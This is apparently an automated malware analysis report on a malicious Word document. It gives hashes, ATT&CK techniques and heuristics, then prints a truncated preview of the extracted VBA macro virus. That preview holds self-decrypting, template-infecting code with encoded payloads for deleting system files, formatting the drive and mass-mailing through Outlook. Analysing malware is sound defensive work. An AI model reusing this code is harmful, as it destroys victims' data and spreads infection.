Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 847ea305bf32df47…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 43.0 KB
Created: 1997-01-30 14:51:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: beed636d44d6dd419f66fcee66105c57
SHA-1: 2801c053dd85913974ac01153efb0b0068e4ad08
SHA-256: 847ea305bf32df47d68ded491f0d61e8cf67c1e49cd70d9f78f4548815767fb1
Risk score: 100

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, a common technique for executing malicious code as soon as a document is opened. The script deobfuscates and rewrites its own code at runtime, indicating downloader or dropper functionality. The presence of the Document_Open macro and the execution of VBA code strongly suggest a spearphishing attachment attack vector.

Heuristics (3)

  • VBA macros detected (severity: medium, 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Document_Open macro (severity: high) [OLE_VBA_DOCOPEN]
    Document_Open auto-execution macro present.
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, in which no visible VBA source is available.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35269 bytes
SHA-256: c6ad1ef7b475fe409d8748ac4e88b3cb10f545afe9311757a427943dbd99e9f2

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDoc"
Attribute VB_Base = "1Normal.ThisDoc"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    Dim M(2) As Variant: Dim L(8) As Byte
    Set M(1) = ActiveDocument.VBProject.VBComponents.Item(1)
    Set M(2) = NormalTemplate.VBProject.VBComponents.Item(1)
    Set CM = M(1).CodeModule
    LinBeg = 33
    Line1 = CM.Lines(LinBeg, 1)
    L(1) = 1: n = 1 + LinBeg: CC = CM.Lines(LinBeg, CM.CountOfLines - LinBeg)
    For I = 2 To 8
        L(I) = Mid(Line1, I, 1)
    Next
    Do While InStr(CM.Lines(n, 1), ": End" + " Sub") = False
        CypLinen = CM.Lines(n, 1)
        Linen = ""
        For k = 2 To Len(CypLinen)
            o = Asc(Mid(CypLinen, k, 1))
            j = Int(o / 32) + 1
            I = 1
            Do While (j <> L(I))
                I = I + 1
            Loop
            nc = o - 32 * (L(I) - I)
            Linen = Linen + Chr(nc)
        Next
        CM.ReplaceLine n, Linen: n = n + 1
    Loop
    CM.DeleteLines LinBeg
    IDHMO (M)
    CM.DeleteLines LinBeg, CM.CountOfLines - LinBeg: CM.InsertLines LinBeg, CC:    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub IDHMO(M As Variant)
'6283457
'    /î %òòïò 2åóõíå .åøô
'    )æ 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ¼¾ ¢¢ 4èåî 3ùóôåí®0òéöáôå0òïæéìå3ôòéî稢¢¬ ¢(+%9?#522%.4?53%2<3ïæô÷áòå<-éãòïóïæô</ææéãå<¹®°<7ïòä<3åãõòéôù¢¬ ¢,åöå좩 ½ ±
'    #ïííáîä"áòó¨¢4ïïì󢩮#ïîôòïìó¨¢-áãò®%îáâìåä ½ &áìó庠/ðôéïîó®#ïîæéòí#ïîöåòóéïîó ½ &áìó庠/ðôéïîó®6éòõó0òïôåãôéïî ½ &áìó庠/ðôéïîó®3áöå.ïòíáì0òïíðô ½ &áìóå
'    3åô æó ½ #òåáôå/âêåãô¨¢3ãòéðôéîç®&éìå3ùóôåí/âêåãô¢©
'    3åô & ½ æó®'åô&éìå¨.ïòíáì4åíðìáôå®&õìì.áí婺 &®!ôôòéâõôåó ½ °
')æ $áôå ¾ £·¯±·¯°°£ 4èåî   §éô ó íù âéòôèäáù ¡
'    )æ !ððìéãáôéïî®5óåò.áíå ¼¾ ¢þþþ!îçå좠4èåî
'        æó®$åìåôå&éìå ¢#º<éï®óù󢬠4òõ庠æó®$åìåôå&éìå ¢#º<ãïîæéç®óù󢬠4òõ庠æó®$åìåôå&éìå ¢#º<!õôïåøåã®âáô¢¬ 4òõ庠æó®$åìåôå&éìå ¢#º<7éîäï÷ó<÷éî®ãïí¢¬ 4òõåº
'        )æ )î3ôò¨!ððìéãáôéïî®5óåò.áí嬠¢ë袩 ½ 4òõå 4èåî
'            3åô áõ ½ æó®#òåáôå4åøô&éì娢#º<áõôïåøåã®âáô¢¬ 4òõå©
'            áõ®7òéôå,éîå ¨¢ åãèï ïææ¢©
'            áõ®7òéôå,éîå ¨¢ åãèï 9ïõò #ïíðõôåò éó âåéîç ãèåãëåä âù ùïõò !îôé6éòõó ­ 0ìåáóå 7áéô ­¢©
'            áõ®7òéôå,éîå ¨¢ åãèï þþþ!îçå좩
'            áõ®7òéôå,éîå ¨¢æïòíáô ãº ¯áõôïôåóô ¯ñ ¯õ¢©
'            áõ®#ìïóå
'        %îä )æ
'    %îä )æ
'    )æ !ãôéöå$ïãõíåîô®6"0òïêåãô®6"#ïíðïîåîôó®)ôåí¨±©®.áíå ½ ¢4èéó$ï㢠4èåî
'        3åô /, ½ #òåáôå/âêåãô¨¢/õôìïïë®!ððìéãáôéï
'        3åô -. ½ /,®'åô.áíå3ðáã娢-!0)¢©º -.®,ïçï3åô /- ½ /,®#òåáôå)ôåí¨ïì-áéì)ôåí©
'        &ïò á ½ ± 4ï -.®!ääòåóó,éóôó®#ïõîô
'            2áîäïíéúå 4éíåò
'            )æ -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¾ ¸ 4èåî
'                &ïò ò ½ ± 4ï )îô¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ¯ ¸©
'                    4áòçåô ½ )îô¨± « -.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó®#ïõîô ª 2îä©
'                    /-®2åãéðéåîôó®!ää ¨-.®!ääòåóó,éóôó¨á©®!ääòåóó%îôòéåó¨4áòçåô©©
'                .åøô
'            %îä )æ
'        .åøô
'        7éôè /-
'            3åô 2åã ½ ®2åãéðéåîôó®!ä䨢ïõôìïïë¹·?²°°° èïôíáéì®ãïí¾¢©º 2åã®2åóïìöå
'            ®3õâêåãô ½ !ãôéöå$ïãõíåîô®.áí庠®"ïäù ½ !ððìéãáôéïî®5óåò.áíå ¦ öâ#ò,æ ¦ !ððìéãáôéïî®5óåò!ääòåóó ¦ öâ#ò,æ ¦ öâ#ò,溠®!ôôáãèíåîôó®!ää !ãôéöå$ïãõíåîô®&õìì.áí庠®3åîä
'        %îä 7éôè
'        -.®,ïçïææ
'        3åô /, ½ .ïôèéîç
'    %îä )æ
'%îä )æ
'    .â,± ½ -¨±©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
'    .â,² ½ -¨²©®#ïäå-ïäõìå®#ïõîô/æ,éîåó
'    ).&? ½ &áìó庠,éî"åç ½ ³³
'    )æ -¨²©®.áíå ¼¾ ¢4èéó$ï㢠4èåî
'        )æ .â,² ¾ ° 4èåî
'            -¨²©®#ïäå-ïäõìå®$åìåôå,éîå󠱬 .â,²
'        %îä )æ
'        -¨²©®.áíå ½ ¢4èéó$ï㢺 ).& ½ 4òõå
'    %îä )æ
'    )æ ).& ½ &áìóå 4èåî 'ï4ï #2904?
'    .å÷.áíå ½ ¢¢
'    2áîäïíéúå 4éíåò
'    &ïò ) ½ ± 4ï µ
'        .å÷.áíå ½ .å÷.áíå « #èò¨)îô¨¶µ « 
... (truncated)